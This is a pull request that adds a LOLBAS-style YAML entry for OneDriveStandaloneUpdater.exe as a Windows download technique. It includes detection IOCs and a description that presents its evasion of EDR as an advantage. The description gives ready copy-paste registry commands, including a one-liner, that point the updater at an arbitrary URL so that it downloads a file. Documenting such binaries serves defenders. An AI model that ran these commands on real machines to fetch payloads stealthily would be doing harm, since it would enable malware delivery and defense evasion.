### PR TITLE
Create OneDriveStandaloneUpdater.yml

### DIFF
--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@@ -1,0 +1,23 @@
+---
+Name: OneDriveStandaloneUpdater.exe
+Description: OneDrive Standalone Updater
+Author: 'Elliot Killick'
+Created: '2021-08-22'
+Commands:
+  - Command: OneDriveStandaloneUpdater
+    Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
+    Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
+    OperatingSystem: Windows 10
+Full_Path:
+  - Path: %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
+Detection:
+  - IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
+  - IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
+Acknowledgement:
+  - Person: Elliot Killick
+    Handle: '@elliotkillick'
+---


### PR DESCRIPTION
New lolbin for downloading arbitrary files: OneDriveStandaloneUpdater.exe

One of the great things about this lolbin is that its execution is not in the slightest bit anomalous which is a common point of detection among many lolbins for EDRs/XDRs. This is because by default when OneDrive is installed it sets up a scheduled task to execute `OneDriveStandaloneUpdater.exe` once every day indefinitely.

Something to note about this lolbin though is that it does require the most up-to-date version of `OneDriveStandaloneUpdater.exe`. Out of the box, the version that ships with Windows 10 20H1 does not work whereas the newest version that ships with the newest 20H2 does. This caused problems for me in my labs where many of the Windows workstations do not have Internet access. However, this is of little concern in the real world where most computers have Internet access due to the aforementioned scheduled task which automatically updates all the OneDrive executables (including `OneDriveStandaloneUpdater.exe` itself) regularly.

Here is the version difference on `OneDriveStandaloneUpdater.exe` between the versions the two Windows 10 versions (where only the latter works):
20H1: 21.139.711.1
20H2: 21.150.725.1

Note that while this lolbin only ships with WIndows 10, it will also exist on other versions of Windows if, for example, Office 365 (or just OneDrive on its own) is installed which is quite likely.

Below is the code you can copy & paste to get up and running quickly with this lolbin:
```
set r=reg add HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig /f /v
%r% UpdateOfficeConfigTimestamp /t REG_QWORD /d 99999999999
%r% ODSUUpdateXMLUrlFromOC /d a
%r% UpdateRingSettingURLFromOC /d https://example.com
%r% UpdateXMLUrlFromOC /d a
OneDriveStandaloneUpdater
```

The code above above can all be combined into a single line by concatenating them with `&`s and putting `call` before each of the `reg` commands to ensure the `r` variable expands in time:

```
set r=reg add HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig /f /v & call %r% UpdateOfficeConfigTimestamp /t REG_QWORD /d 99999999999 & call %r% ODSUUpdateXMLUrlFromOC /d a & call %r% UpdateRingSettingURLFromOC /d https://example.com & call %r% UpdateXMLUrlFromOC /d a & OneDriveStandaloneUpdater
```

In cases where `/t` is not specified, `reg` assumes `REG_SZ`. These were omitted to shorten the code.

Lastly, the `99999999999` UNIX epoch cache expiry date lands on November 16th, 5138. So, we should be good for the next 3000 years (haha)!

Tweet coming soon to showcase all this in action (it will be added to the resources section).